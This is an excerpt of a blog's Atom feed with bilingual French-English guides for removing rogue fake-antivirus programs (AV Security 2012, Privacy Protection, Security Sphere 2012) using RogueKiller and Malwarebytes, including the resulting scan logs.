/&gt;&lt;br /&gt;&lt;br /&gt;Termine : &amp;lt;&amp;lt; RKreport[1].txt &amp;gt;&amp;gt;&lt;br /&gt;RKreport[1].txt&lt;br /&gt;&lt;/span&gt;&lt;/blockquote&gt;
&lt;ul&gt;
&lt;li&gt;Ensuite passer un scan avec &lt;a href="http://www.malwarebytes.org/mbam-download.php"&gt;Malwarebytes&lt;/a&gt; -- Then do a scan with &lt;a href="http://www.malwarebytes.org/mbam-download.php"&gt;Malwarebytes&lt;/a&gt;&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote&gt;
&lt;span style="font-size: x-small;"&gt;&lt;span style="color: #444444;"&gt;Malwarebytes' Anti-Malware 1.51.2.1300&lt;br /&gt;www.malwarebytes.org&lt;br /&gt;&lt;br /&gt;Version de la base de données: 8180&lt;br /&gt;&lt;br /&gt;Windows 5.1.2600 Service Pack 3&lt;br /&gt;Internet Explorer 6.0.2900.5512&lt;br /&gt;&lt;br /&gt;17/11/2011 07:53:27&lt;br /&gt;mbam-log-2011-11-17 (07-53-27).txt&lt;br /&gt;&lt;br /&gt;Type d'examen: Examen complet (C:\|)&lt;br /&gt;Elément(s) analysé(s): 153531&lt;br /&gt;Temps écoulé: 3 minute(s), 46 seconde(s)&lt;br /&gt;&lt;br /&gt;Processus mémoire infecté(s): 0&lt;br /&gt;Module(s) mémoire infecté(s): 0&lt;br /&gt;Clé(s) du Registre infectée(s): 0&lt;br /&gt;Valeur(s) du Registre infectée(s): 0&lt;br /&gt;Elément(s) de données du Registre infecté(s): 0&lt;br /&gt;Dossier(s) infecté(s): 0&lt;br /&gt;Fichier(s) infecté(s): 5&lt;br /&gt;&lt;br /&gt;Processus mémoire infecté(s):&lt;br /&gt;(Aucun élément nuisible détecté)&lt;br /&gt;&lt;br /&gt;Module(s) mémoire infecté(s):&lt;br /&gt;(Aucun élément nuisible détecté)&lt;br /&gt;&lt;br /&gt;Clé(s) du Registre infectée(s):&lt;br /&gt;(Aucun élément nuisible détecté)&lt;br /&gt;&lt;br /&gt;Valeur(s) du Registre infectée(s):&lt;br /&gt;(Aucun élément nuisible détecté)&lt;br /&gt;&lt;br /&gt;Elément(s) de données du Registre infecté(s):&lt;br /&gt;(Aucun élément nuisible détecté)&lt;br /&gt;&lt;br /&gt;Dossier(s) infecté(s):&lt;br /&gt;(Aucun élément nuisible détecté)&lt;br /&gt;&lt;br /&gt;Fichier(s) infecté(s):&lt;br /&gt;c:\documents and settings\tigzy\Bureau\rk_quarantine\av security 2012v121.exe.vir (Trojan.FakeMS1) -&amp;gt; Quarantined and deleted successfully.&lt;br /&gt;c:\documents and settings\tigzy\local settings\temporary internet files\Content.IE5\ZXYKNMW2\av security 2012v121[1].vir (Trojan.FakeMS1) -&amp;gt; Quarantined and deleted successfully.&lt;br /&gt;c:\WINDOWS\system32\av security 2012v121.exe (Trojan.FakeMS1) -&amp;gt; Quarantined and deleted successfully.&lt;br /&gt;c:\documents and settings\tigzy\application data\ldr.ini (Malware.Trace) -&amp;gt; Quarantined and deleted successfully.&lt;br /&gt;c:\documents and settings\tigzy\Bureau\av security 2012.lnk (Rogue.AVSecurity2012) -&amp;gt; Quarantined and deleted successfully.&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: x-small;"&gt;&amp;nbsp;&lt;span style="color: #666666;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;
&lt;ul&gt;
&lt;li&gt;Le rogue devrait être supprimé -- The rogue must have been deleted &lt;/li&gt;
&lt;/ul&gt;&lt;img src="http://feeds.feedburner.com/~r/Tigzy-rk/~4/KDOjd5kBY6g" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://tigzyrk.blogspot.com/feeds/3666409201282472584/comments/default" title="Publier les commentaires" /><link rel="replies" type="text/html" href="http://tigzyrk.blogspot.com/2011/11/rogue-av-security-2012.html#comment-form" title="0 commentaires" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8972660870357177426/posts/default/3666409201282472584?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8972660870357177426/posts/default/3666409201282472584?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Tigzy-rk/~3/KDOjd5kBY6g/rogue-av-security-2012.html" title="[Rogue] AV Security 2012" /><author><name>tigzy-RK</name><uri>http://www.blogger.com/profile/09732073712132941191</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://2.bp.blogspot.com/-ZTcduhIm5tM/TamcgoAE1dI/AAAAAAAAABg/Gqy2hRs5Vy0/s220/tigzy1295109643.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-7p0gTx6ONGo/TsSv6cugipI/AAAAAAAAAE4/muIPm0vFV7k/s72-c/Capture.PNG" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://tigzyrk.blogspot.com/2011/11/rogue-av-security-2012.html</feedburner:origLink></entry><entry gd:etag="W/&quot;D0cERns8eCp7ImA9WhRSEE0.&quot;"><id>tag:blogger.com,1999:blog-8972660870357177426.post-806781523829639839</id><published>2011-11-11T01:29:00.001-08:00</published><updated>2011-11-11T01:50:07.570-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-11T01:50:07.570-08:00</app:edited><title>[Rogue] Privacy Protection</title><content type="html">&lt;div style="text-align: center;"&gt;
&lt;span style="font-size: x-large;"&gt;&lt;span style="color: #3d85c6;"&gt;Comment supprimer Privacy Protection&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="font-size: x-large;"&gt;&lt;span style="color: #3d85c6;"&gt;How to get rid of Privacy Protection&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-W_kLsWoVi7w/TglyEw5ZtgI/AAAAAAAAADA/FzUtNEovK5M/s1600/MSREmovalTool.PNG" style="margin-left: 1em; margin-right: 1em;"&gt; &lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-WcHLv5JtjSo/TirlUC7coPI/AAAAAAAAAD0/hEOFrBxEi5M/s1600/zsgu1.PNG" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;
&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-veruH0uKKBA/TrzsG3nfgpI/AAAAAAAAAEg/_flOC76HeDU/s1600/Capture.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="470" src="http://3.bp.blogspot.com/-veruH0uKKBA/TrzsG3nfgpI/AAAAAAAAAEg/_flOC76HeDU/s640/Capture.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-j7FvSvWv5e0/TqEKzp9468I/AAAAAAAAAEQ/DZzvw--z6r8/s1600/Capture.PNG" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-iDLiGcASxzA/TktcYVa1o3I/AAAAAAAAAEA/JT95oCJub08/s1600/Capture.PNG" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;
&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;object class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://i.ytimg.com/vi/b3ZOL0L1HRE/0.jpg" height="375" width="600"&gt;&lt;param name="movie" value="http://www.youtube.com/v/b3ZOL0L1HRE?version=3&amp;f=user_uploads&amp;c=google-webdrive-0&amp;app=youtube_gdata" /&gt;




&lt;param name="bgcolor" value="#FFFFFF" /&gt;




&lt;embed width="600" height="375"  src="http://www.youtube.com/v/b3ZOL0L1HRE?version=3&amp;f=user_uploads&amp;c=google-webdrive-0&amp;app=youtube_gdata" type="application/x-shockwave-flash"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;Télécharger et lancer &lt;a href="http://www.sur-la-toile.com/RogueKiller/"&gt;RogueKiller&lt;/a&gt; en mode 2 (Suppression) -- Download and start &lt;a href="http://www.sur-la-toile.com/RogueKiller/"&gt;RogueKiller&lt;/a&gt; with mode 2 (Delete)&lt;/li&gt;
&lt;li&gt;S'il ne peut pas se lancer, renommez le en "&lt;b&gt;winlogon.exe&lt;/b&gt;" -- Il you are unable to lauch it, rename it as "&lt;b&gt;winlogon.exe&lt;/b&gt;" &lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li&gt;Vous devriez avoir le rapport suivant -- You should obtain the following report&lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote style="color: #444444;"&gt;
&lt;span style="font-size: x-small;"&gt;RogueKiller V6.1.7 [05/11/2011] par Tigzy&lt;br /&gt;mail: tigzyRK&amp;lt;at&amp;gt;gmail&amp;lt;dot&amp;gt;com&lt;br /&gt;Remontees: http://www.sur-la-toile.com/discussion-193725-1-BRogueKillerD-Remontees.html&lt;br /&gt;Blog: http://tigzyrk.blogspot.com&lt;br /&gt;&lt;br /&gt;Systeme d'exploitation: Windows XP (5.1.2600 Service Pack 3) 32 bits version&lt;br /&gt;Demarrage : Mode normal&lt;br /&gt;Utilisateur: tigzy [Droits d'admin]&lt;br /&gt;Mode: Suppression -- Date : 11/11/2011 10:22:02&lt;br /&gt;&lt;br /&gt;¤¤¤ Processus malicieux: 1 ¤¤¤&lt;br /&gt;[SUSP PATH] privacy.exe -- C:\Documents and Settings\All Users\Application Data\privacy.exe -&amp;gt; KILLED [TermProc]&lt;br /&gt;&lt;br /&gt;¤¤¤ Entrees de registre: 2 ¤¤¤&lt;br /&gt;[SUSP PATH] HKCU\[...]\Run : Privacy Protection (C:\Documents and Settings\All Users\Application Data\privacy.exe) -&amp;gt; DELETED&lt;br /&gt;[HJ] HKLM\[...]\NewStartPanel : {20D04FE0-3AEA-1069-A2D8-08002B30309D} (1) -&amp;gt; REPLACED ()&lt;br /&gt;&lt;br /&gt;¤¤¤ Fichiers / Dossiers particuliers: ¤¤¤&lt;br /&gt;&lt;br /&gt;¤¤¤ Driver: [LOADED] ¤¤¤&lt;br /&gt;&lt;br /&gt;¤¤¤ Infection :&amp;nbsp; ¤¤¤&lt;br /&gt;&lt;br /&gt;¤¤¤ Fichier HOSTS: ¤¤¤&lt;br /&gt;127.0.0.1&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; localhost&lt;br /&gt;::1&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; localhost&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Termine : &amp;lt;&amp;lt; RKreport[1].txt &amp;gt;&amp;gt;&lt;br /&gt;RKreport[1].txt&lt;/span&gt;&lt;/blockquote&gt;
&lt;ul&gt;
&lt;li&gt;Ensuite passer un scan avec &lt;a href="http://www.malwarebytes.org/mbam-download.php"&gt;Malwarebytes&lt;/a&gt; -- Then do a scan with &lt;a href="http://www.malwarebytes.org/mbam-download.php"&gt;Malwarebytes&lt;/a&gt;&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote&gt;
&lt;span style="font-size: x-small;"&gt;&lt;span style="color: #444444;"&gt;Malwarebytes' Anti-Malware 1.51.2.1300&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;www.malwarebytes.org&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;Version de la base de données: 8137&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;Windows 5.1.2600 Service Pack 3&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;Internet Explorer 6.0.2900.5512&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;11/11/2011 10:31:34&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;mbam-log-2011-11-11 (10-31-34).txt&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;Type d'examen: Examen complet (C:\|)&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;Elément(s) analysé(s): 152446&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;Temps écoulé: 3 minute(s), 10 seconde(s)&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;Processus mémoire infecté(s): 0&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;Module(s) mémoire infecté(s): 0&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;Clé(s) du Registre infectée(s): 0&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;Valeur(s) du Registre infectée(s): 0&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;Elément(s) de données du Registre infecté(s): 0&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;Dossier(s) infecté(s): 0&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;Fichier(s) infecté(s): 5&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;Processus mémoire infecté(s):&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;(Aucun élément nuisible détecté)&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;Module(s) mémoire infecté(s):&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;(Aucun élément nuisible détecté)&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;Clé(s) du Registre infectée(s):&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;(Aucun élément nuisible détecté)&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;Valeur(s) du Registre infectée(s):&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;(Aucun élément nuisible détecté)&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;Elément(s) de données du Registre infecté(s):&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;(Aucun élément nuisible détecté)&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;Dossier(s) infecté(s):&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;(Aucun élément nuisible détecté)&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;Fichier(s) infecté(s):&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;c:\documents and settings\all users\application data\privacy.exe (Exploit.Drop.Gen) -&amp;gt; Quarantined and deleted successfully.&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;c:\documents and settings\tigzy\Bureau\privacyprotection.exe (Exploit.Drop.Gen) -&amp;gt; Quarantined and deleted successfully.&lt;/span&gt;&lt;span style="color: #444444;"&gt;.&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;c:\documents and settings\tigzy\Bureau\rk_quarantine\privacy.exe.vir (Exploit.Drop.Gen) -&amp;gt; Quarantined and deleted successfully.&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;c:\documents and settings\tigzy\local settings\Temp\7.tmp (Exploit.Drop.Gen) -&amp;gt; Quarantined and deleted successfully.&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;c:\documents and settings\tigzy\local settings\temporary internet files\Content.IE5\ZXYKNMW2\privacyprotection[1].vir (Exploit.Drop.Gen) -&amp;gt; Quarantined and deleted successfully.&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: x-small;"&gt;
&lt;span style="color: #666666;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;
&lt;ul&gt;
&lt;li&gt;Le rogue devrait être supprimé -- The rogue must have been deleted&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li&gt;Si dans les lignes du rapport RogueKiller vous voyez quelque chose qui ressemble à ça, c'est qu'il y a un rootkit ZeroAccess avec -- If in the RogueKiller report you see something like this, there must have a ZeroAccess rootkit.&lt;/li&gt;
&lt;/ul&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="font-size: x-small;"&gt;&lt;b&gt;&amp;nbsp;&lt;span style="font-size: small;"&gt;C:\WINDOWS\2277133728:1605518712.exe&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;ul style="text-align: left;"&gt;
&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;span style="font-size: small;"&gt;Si c'est le cas, je vous conseille de suivre la démarche suivante -- If this is the case, I advise you to follow the following procedure:&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;span style="font-size: x-small;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;a href="http://tigzyrk.blogspot.com/2011/09/rootkit-zeroaccess-max.html" target="_blank"&gt;Rootkit ZeroAccess&lt;/a&gt;&lt;/b&gt; &lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;/ul&gt;&lt;img src="http://feeds.feedburner.com/~r/Tigzy-rk/~4/ddGb9Fe-BbU" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://tigzyrk.blogspot.com/feeds/806781523829639839/comments/default" title="Publier les commentaires" /><link rel="replies" type="text/html" href="http://tigzyrk.blogspot.com/2011/11/rogue-privacy-protection.html#comment-form" title="0 commentaires" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8972660870357177426/posts/default/806781523829639839?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8972660870357177426/posts/default/806781523829639839?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Tigzy-rk/~3/ddGb9Fe-BbU/rogue-privacy-protection.html" title="[Rogue] Privacy Protection" /><author><name>tigzy-RK</name><uri>http://www.blogger.com/profile/09732073712132941191</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://2.bp.blogspot.com/-ZTcduhIm5tM/TamcgoAE1dI/AAAAAAAAABg/Gqy2hRs5Vy0/s220/tigzy1295109643.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-veruH0uKKBA/TrzsG3nfgpI/AAAAAAAAAEg/_flOC76HeDU/s72-c/Capture.PNG" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://tigzyrk.blogspot.com/2011/11/rogue-privacy-protection.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CUYFRHs9fSp7ImA9WhRTF0g.&quot;"><id>tag:blogger.com,1999:blog-8972660870357177426.post-5828447114179796947</id><published>2011-10-20T23:04:00.000-07:00</published><updated>2011-11-08T03:51:55.565-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-08T03:51:55.565-08:00</app:edited><title>[Rogue] Security Sphere 2012</title><content type="html">&lt;div style="text-align: center;"&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="color: #3d85c6;"&gt;Comment supprimer Security Sphere 2012&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="color: #3d85c6;"&gt;How to get rid of Security Sphere 2012&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-W_kLsWoVi7w/TglyEw5ZtgI/AAAAAAAAADA/FzUtNEovK5M/s1600/MSREmovalTool.PNG" style="margin-left: 1em; margin-right: 1em;"&gt; &lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-WcHLv5JtjSo/TirlUC7coPI/AAAAAAAAAD0/hEOFrBxEi5M/s1600/zsgu1.PNG" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;
&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-j7FvSvWv5e0/TqEKzp9468I/AAAAAAAAAEQ/DZzvw--z6r8/s1600/Capture.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="481" src="http://2.bp.blogspot.com/-j7FvSvWv5e0/TqEKzp9468I/AAAAAAAAAEQ/DZzvw--z6r8/s640/Capture.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-r0iI6TX79s0/TpkrxV33MYI/AAAAAAAAAEI/--WzBM6s4Tk/s1600/Capture.PNG" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-iDLiGcASxzA/TktcYVa1o3I/AAAAAAAAAEA/JT95oCJub08/s1600/Capture.PNG" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;
&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;object class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://i.ytimg.com/vi/kyQrkaaE_bs/0.jpg" height="375" width="600"&gt;&lt;param name="movie" value="http://www.youtube.com/v/kyQrkaaE_bs?version=3&amp;f=user_uploads&amp;c=google-webdrive-0&amp;app=youtube_gdata" /&gt;




&lt;param name="bgcolor" value="#FFFFFF" /&gt;




&lt;embed width="600" height="375"  src="http://www.youtube.com/v/kyQrkaaE_bs?version=3&amp;f=user_uploads&amp;c=google-webdrive-0&amp;app=youtube_gdata" type="application/x-shockwave-flash"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;Télécharger et lancer &lt;a href="http://www.sur-la-toile.com/RogueKiller/"&gt;RogueKiller&lt;/a&gt; en mode 2 (Suppression) -- Download and start &lt;a href="http://www.sur-la-toile.com/RogueKiller/"&gt;RogueKiller&lt;/a&gt; with mode 2 (Delete)&lt;/li&gt;
&lt;li&gt;S'il ne peut pas se lancer, renommez le en "&lt;b&gt;winlogon.exe&lt;/b&gt;" -- Il you are unable to lauch it, rename it as "&lt;b&gt;winlogon.exe&lt;/b&gt;" &lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li&gt;Vous devriez avoir le rapport suivant -- You should obtain the following report&lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote style="color: #444444;"&gt;
&lt;span style="font-size: x-small;"&gt;RogueKiller V6.1.3 [14/10/2011] par Tigzy&lt;br /&gt;contact sur &lt;a href="http://www.sur-la-toile.com/" target="_blank"&gt;http://www.sur-la-toile.com&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style="cursor: pointer; display: inline-block; height: 16px; width: 16px;"&gt;
&lt;/div&gt;
&lt;span style="font-size: x-small;"&gt;&lt;br /&gt;mail: tigzyRK&amp;lt;at&amp;gt;gmail&amp;lt;dot&amp;gt;com&lt;br /&gt;Remontees: &lt;a href="http://www.sur-la-toile.com/discussion-193725-1-BRogueKillerD-Remontees.html" target="_blank"&gt;http://www.sur-la-toile.com/&lt;wbr&gt;&lt;/wbr&gt;discussion-193725-1-&lt;wbr&gt;&lt;/wbr&gt;BRogueKillerD-Remontees.html&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style="cursor: pointer; display: inline-block; height: 16px; width: 16px;"&gt;
&lt;/div&gt;
&lt;span style="font-size: x-small;"&gt;&lt;br /&gt;&lt;br /&gt;Systeme d'exploitation: Windows XP (5.1.2600 Service Pack 3) 32 bits version
&lt;/span&gt;&lt;span style="font-size: x-small;"&gt;&lt;br /&gt;Demarrage : Mode normal&lt;br /&gt;Utilisateur: tigzy [Droits d'admin]&lt;br /&gt;Mode: Suppression -- Date : 21/10/2011 07:43:03&lt;br /&gt;&lt;br /&gt;Processus malicieux: 1&lt;br /&gt;
[SUSP PATH] eP02401NmFnE02401.exe -- c:\documents and settings\all users\application data\ep02401nmfne02401\&lt;/span&gt;&lt;br /&gt;
&lt;div id=":42"&gt;
&lt;wbr&gt;&lt;/wbr&gt;&lt;span style="font-size: x-small;"&gt;ep02401nmfne02401.exe -&amp;gt; KILLED [TermProc]&lt;br /&gt;&lt;br /&gt;Entrees de registre: 2&lt;br /&gt;[SUSP PATH] HKCU\[...]\RunOnce : eP02401NmFnE02401 (C:\Documents and Settings\All Users\Application Data\eP02401NmFnE02401\&lt;/span&gt;&lt;wbr&gt;&lt;/wbr&gt;&lt;span style="font-size: x-small;"&gt;eP02401NmFnE02401.exe) -&amp;gt; DELETED&lt;br /&gt;
[HJ] HKLM\[...]\NewStartPanel : {20D04FE0-3AEA-1069-A2D8-&lt;/span&gt;&lt;wbr&gt;&lt;/wbr&gt;&lt;span style="font-size: x-small;"&gt;08002B30309D} (1) -&amp;gt; REPLACED ()&lt;br /&gt;&lt;br /&gt;Fichiers / Dossiers particuliers:&lt;br /&gt;&lt;br /&gt;Driver: [LOADED] &lt;br /&gt;&lt;br /&gt;Fichier HOSTS:&lt;br /&gt;127.0.0.1&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; localhost&lt;br /&gt;::1&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; localhost&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Termine : &amp;lt;&amp;lt; RKreport[1].txt &amp;gt;&amp;gt;
&lt;/span&gt;&lt;span style="font-size: x-small;"&gt;&lt;br /&gt;RKreport[1].txt&lt;/span&gt;&lt;/div&gt;
&lt;/blockquote&gt;
&lt;ul&gt;
&lt;li&gt;Ensuite passer un scan avec &lt;a href="http://www.malwarebytes.org/mbam-download.php"&gt;Malwarebytes&lt;/a&gt; -- Then do a scan with &lt;a href="http://www.malwarebytes.org/mbam-download.php"&gt;Malwarebytes&lt;/a&gt;&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote&gt;
&lt;span style="font-size: x-small;"&gt;&amp;nbsp;&lt;span style="color: #444444;"&gt;Malwarebytes' Anti-Malware 1.51.2.1300&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;a href="http://www.malwarebytes.org/" style="color: #444444;" target="_blank"&gt;www.malwarebytes.org&lt;/a&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;Version de la base de données: 7991&lt;/span&gt;&lt;br style="color: #444444;" /&gt;&lt;span style="color: #444444;"&gt;
